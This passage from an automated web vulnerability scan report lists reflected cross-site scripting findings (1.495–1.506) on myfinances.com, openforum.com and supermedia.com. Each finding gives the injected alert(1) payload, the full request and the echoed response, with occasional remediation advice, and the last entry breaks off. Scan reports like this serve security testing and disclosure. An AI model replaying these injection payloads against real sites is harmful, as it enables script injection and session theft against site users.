1.495. http://www.myfinances.com/budget.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /budget.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91d41"><script>alert(1)</script>3d8e0c43e90 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /budget.php?91d41"><script>alert(1)</script>3d8e0c43e90=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 15:55:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 15:55:20 GMT
Content-Length: 21653
Connection: close
Set-Cookie: ARPT=VRWOZXS192.168.100.28CKOUU; path=/
Set-Cookie: PHPSESSID=r5fgdi9rsbvhrv1uang897d6f7; path=/
Set-Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-ep3Zgx3x55wzjtYGmmA8IHHkMtnMePS5Wjisha7wpvxzTpOwlpCxTnjUY2Nzh3vrxUYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQKB8ZM44-LhR9KSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn7X_rYpwmUw7b4CTEiWPaQLH4pwjPOr-mcyYKvi6WopOasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-ep3Zgx3x55wzjtYGmmA8IHHkMtnMePS5Wjisha7wpvxzTpOwlpCxTnjUY2Nzh3vrxUYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQKB8ZM44-LhR9KSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn7X_rYpwmUw7b4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-ep3Zgx3x55wzjtYGmmA8IHHkMtnMePS5Wjisha7wpvxzTpOwlpCxTnjUY2Nzh3vrxUYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQKB8ZM44-LhR9KSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn7X_rYpwmUw7b4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<input type="hidden" name="back" value="/budget.php?91d41"><script>alert(1)</script>3d8e0c43e90=1" />
...[SNIP]...

1.496. http://www.myfinances.com/budget.php [query parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /budget.php

Issue detail

The value of the query request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e9843'><script>alert(1)</script>2707c201b22 was submitted in the query parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /budget.php?query=savings+accountse9843'><script>alert(1)</script>2707c201b22&mfid=mf-4d404e8fe4f0d&mfs=adwc&&client=ca-dp-r-mark03_3ph_js HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 15:55:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 15:55:41 GMT
Content-Length: 19651
Connection: close
Set-Cookie: ARPT=VRWOZXS192.168.100.28CKOUU; path=/
Set-Cookie: PHPSESSID=8mri1qtefnba9k49k4ep3nl8h2; path=/
Set-Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-eno6Jjl93N8GpduxNYGBxG5Y6FFxht_Njk7BPyPmzIQKHUnSLStdd3m_SBtFRIWv2UYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQJMGm4g2vKixNKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn5Ae7198oJNXL4CTEiWPaQLH4pwjPOr-mcyYKvi6WopOasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-eno6Jjl93N8GpduxNYGBxG5Y6FFxht_Njk7BPyPmzIQKHUnSLStdd3m_SBtFRIWv2UYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQJMGm4g2vKixNKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn5Ae7198oJNXL4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-eno6Jjl93N8GpduxNYGBxG5Y6FFxht_Njk7BPyPmzIQKHUnSLStdd3m_SBtFRIWv2UYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQJMGm4g2vKixNKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn5Ae7198oJNXL4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<input type='text' id='keyword' name='keyword' title='savings accountse9843'><script>alert(1)</script>2707c201b22' value ='savings accountse9843'>
...[SNIP]...

1.497. http://www.myfinances.com/budget.php [query parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /budget.php

Issue detail

The value of the query request parameter is copied into the HTML document as plain text between tags. The payload a2ce6<script>alert(1)</script>826352099bb was submitted in the query parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /budget.php?query=savings+accountsa2ce6<script>alert(1)</script>826352099bb&mfid=mf-4d404e8fe4f0d&mfs=adwc&&client=ca-dp-r-mark03_3ph_js HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 15:55:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 15:55:45 GMT
Content-Length: 19629
Connection: close
Set-Cookie: ARPT=VRWOZXS192.168.100.26CKOUQ; path=/
Set-Cookie: PHPSESSID=u15624i2oae1adjjrl0fa5mn65; path=/
Set-Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-enLhu7KjEvXpkJfrfAQOnZ1eEyEUcIq0WVmXir4NGwcZbmUHGK2l4Dwd73MuXjqeOUYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQJ6pTPd4ZzeqNKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn6nygrYAfQJ-r4CTEiWPaQLH4pwjPOr-mcyYKvi6WopOasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-enLhu7KjEvXpkJfrfAQOnZ1eEyEUcIq0WVmXir4NGwcZbmUHGK2l4Dwd73MuXjqeOUYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQJ6pTPd4ZzeqNKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn6nygrYAfQJ-r4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-enLhu7KjEvXpkJfrfAQOnZ1eEyEUcIq0WVmXir4NGwcZbmUHGK2l4Dwd73MuXjqeOUYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQJ6pTPd4ZzeqNKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn6nygrYAfQJ-r4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<h2>Results for &lsquo;savings accountsa2ce6<script>alert(1)</script>826352099bb&rsquo;</h2>
...[SNIP]...

1.498. http://www.myfinances.com/contact.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /contact.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 613cb'><script>alert(1)</script>8f2541e63ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact.html?613cb'><script>alert(1)</script>8f2541e63ae=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:02:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:02:44 GMT
Content-Length: 8051
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<form class='form' enctype='multipart/form-data' action='/contact.html?613cb'><script>alert(1)</script>8f2541e63ae=1' method='post' >
...[SNIP]...

1.499. http://www.openforum.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.openforum.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54350'-alert(1)-'b64566be317 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?54350'-alert(1)-'b64566be317=1 HTTP/1.1
Host: www.openforum.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Thu, 03 Feb 2011 13:50:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 13:50:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: plv=lv=af6b38e2-af41-4de2-b212-3468d374f14c; path=/
Set-Cookie: BIGipServerAmex=2735450304.20480.0000; path=/
Content-Length: 102188


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpro
...[SNIP]...

       AX.login_link = 'https://www99.americanexpress.com/myca/usermgt/us/action?request_type=auth_nucleusLogin&Face=en_US&lgnsrc=nucleus&PROSPECT=Y&TPREDIRECT_URL=https%3a%2f%2fwww.openforum.com%2f%3f54350'-alert(1)-'b64566be317%253d1';
       AX.logout_dest_url = 'https://www.openforum.com/?54350'-alert(1)-'b64566be317%3d1';
   /*]]>
...[SNIP]...

1.500. https://www.openforum.com/ [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.openforum.com
Path:   /

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4b2f'-alert(1)-'731207dc1c was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?cid=inav_homea4b2f'-alert(1)-'731207dc1c&inav=menu_business_openforum HTTP/1.1
Host: www.openforum.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
SSL: True
Expires: Thu, 03 Feb 2011 13:50:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 13:50:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: plv=lv=af6b38e2-af41-4de2-b212-3468d374f14c; path=/
Set-Cookie: BIGipServerAmex=2785781952.20480.0000; path=/
Content-Length: 102363


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpro
...[SNIP]...
ink = 'https://www99.americanexpress.com/myca/usermgt/us/action?request_type=auth_nucleusLogin&Face=en_US&lgnsrc=nucleus&PROSPECT=Y&TPREDIRECT_URL=https%3a%2f%2fwww.openforum.com%2f%3fcid%253dinav_homea4b2f'-alert(1)-'731207dc1c%2526inav%253dmenu_business_openforum';
       AX.logout_dest_url = 'https://www.openforum.com/?cid%3dinav_homea4b2f'-alert(1)-'731207dc1c%26inav%3dmenu_business_openforum';
   /*]]>
...[SNIP]...

1.501. https://www.openforum.com/ [inav parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.openforum.com
Path:   /

Issue detail

The value of the inav request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1db04'-alert(1)-'749ae354a20 was submitted in the inav parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?cid=inav_home&inav=menu_business_openforum1db04'-alert(1)-'749ae354a20 HTTP/1.1
Host: www.openforum.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
SSL: True
Expires: Thu, 03 Feb 2011 13:50:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 13:50:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: plv=lv=af6b38e2-af41-4de2-b212-3468d374f14c; path=/
Set-Cookie: BIGipServerAmex=2819336384.20480.0000; path=/
Content-Length: 102377


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpro
...[SNIP]...
com/myca/usermgt/us/action?request_type=auth_nucleusLogin&Face=en_US&lgnsrc=nucleus&PROSPECT=Y&TPREDIRECT_URL=https%3a%2f%2fwww.openforum.com%2f%3fcid%253dinav_home%2526inav%253dmenu_business_openforum1db04'-alert(1)-'749ae354a20';
       AX.logout_dest_url = 'https://www.openforum.com/?cid%3dinav_home%26inav%3dmenu_business_openforum1db04'-alert(1)-'749ae354a20';
   /*]]>
...[SNIP]...

1.502. https://www.openforum.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.openforum.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a374f'-alert(1)-'7289baab9b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?a374f'-alert(1)-'7289baab9b9=1 HTTP/1.1
Host: www.openforum.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
SSL: True
Expires: Thu, 03 Feb 2011 13:50:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 13:50:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: plv=lv=af6b38e2-af41-4de2-b212-3468d374f14c; path=/
Set-Cookie: BIGipServerAmex=2836113600.20480.0000; path=/
Content-Length: 102556


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpro
...[SNIP]...

       AX.login_link = 'https://www99.americanexpress.com/myca/usermgt/us/action?request_type=auth_nucleusLogin&Face=en_US&lgnsrc=nucleus&PROSPECT=Y&TPREDIRECT_URL=https%3a%2f%2fwww.openforum.com%2f%3fa374f'-alert(1)-'7289baab9b9%253d1';
       AX.logout_dest_url = 'https://www.openforum.com/?a374f'-alert(1)-'7289baab9b9%3d1';
   /*]]>
...[SNIP]...

1.503. http://www.supermedia.com/business-listings [campaignId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /business-listings

Issue detail

The value of the campaignId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aac2e"%3balert(1)//8d034beed23 was submitted in the campaignId parameter. This input was echoed as aac2e";alert(1)//8d034beed23 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /business-listings?tsrc=SP&campaignId=SP_FT_AddEditaBusinessaac2e"%3balert(1)//8d034beed23 HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=check#true#1296759636|session#1296759528614-838261#1296761436;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:16:53 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Get Your Free Business Listing | SuperMedia.com Advertising</title>



...[SNIP]...
rop24="";
s.prop25="";
s.prop26="";
s.prop27="";
s.prop28="";
s.prop29="";
s.prop30="";
/* Conversion Variables */
s.zip="";
s.purchaseID="";
s.state="";
s.events="";
s.campaign="SP_FT_AddEditaBusinessaac2e";alert(1)//8d034beed23";
s.products="";
s.eVar1="";
s.eVar2="SP";
s.eVar3="";
s.eVar4="";
s.eVar5="";
s.eVar6="";
s.eVar7="";
s.eVar8="";
s.eVar9="";
s.eVar10="";
s.eVar11="";
s.eVar12="";
s.eVar13="";
s.eVar14="";
s.eVar15
...[SNIP]...

1.504. http://www.supermedia.com/business-listings [tsrc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /business-listings

Issue detail

The value of the tsrc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20b9c"%3balert(1)//623d3053168 was submitted in the tsrc parameter. This input was echoed as 20b9c";alert(1)//623d3053168 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /business-listings?tsrc=SP20b9c"%3balert(1)//623d3053168&campaignId=SP_FT_AddEditaBusiness HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=check#true#1296759636|session#1296759528614-838261#1296761436;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:16:48 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Get Your Free Business Listing | SuperMedia.com Advertising</title>



...[SNIP]...
p27="";
s.prop28="";
s.prop29="";
s.prop30="";
/* Conversion Variables */
s.zip="";
s.purchaseID="";
s.state="";
s.events="";
s.campaign="SP_FT_AddEditaBusiness";
s.products="";
s.eVar1="";
s.eVar2="SP20b9c";alert(1)//623d3053168";
s.eVar3="";
s.eVar4="";
s.eVar5="";
s.eVar6="";
s.eVar7="";
s.eVar8="";
s.eVar9="";
s.eVar10="";
s.eVar11="";
s.eVar12="";
s.eVar13="";
s.eVar14="";
s.eVar15="";
s.eVar16="";
s.eVar17="";
s.eVar18="
...[SNIP]...

1.505. http://www.supermedia.com/business-listings/business-profile [&tsrc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /business-listings/business-profile

Issue detail

The value of the &tsrc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 198c8"%3balert(1)//96cb9badcf2 was submitted in the &tsrc parameter. This input was echoed as 198c8";alert(1)//96cb9badcf2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /business-listings/business-profile?&tsrc=SP198c8"%3balert(1)//96cb9badcf2&campaignId=BP:Update+Your+Profile+Top HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 17:05:34 GMT
Set-Cookie: JSESSIONID=B9B8A68CD261E7EEF56BA494FDEE7747.app3-a1; Path=/
Set-Cookie: trafficSource="SP198c8\";alert(1)//96cb9badcf2"; Expires=Sat, 05-Mar-2011 17:05:33 GMT; Path=/
Set-Cookie: CstrStatus=U; Expires=Sat, 05-Mar-2011 17:05:33 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close
Set-Cookie: NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139f45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Your Business Profile | SuperMedia.com Advertising</title>



...[SNIP]...
"";
s.prop28="";
s.prop29="";
s.prop30="";
/* Conversion Variables */
s.zip="";
s.purchaseID="";
s.state="";
s.events="";
s.campaign="BP:Update Your Profile Top";
s.products="";
s.eVar1="";
s.eVar2="SP198c8";alert(1)//96cb9badcf2";
s.eVar3="";
s.eVar4="";
s.eVar5="";
s.eVar6="";
s.eVar7="";
s.eVar8="";
s.eVar9="";
s.eVar10="";
s.eVar11="";
s.eVar12="";
s.eVar13="";
s.eVar14="";
s.eVar15="";
s.eVar16="";
s.eVar17="";
s.eVar18="
...[SNIP]...

1.506. http://www.supermedia.com/business-listings/business-profile [campaignId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /business-listings/business-profile

Issue detail

The value of the campaignId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7d7a"%3balert(1)//5f4e0e8915 was submitted in the campaignId parameter. This input was echoed as b7d7a";alert(1)//5f4e0e8915 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

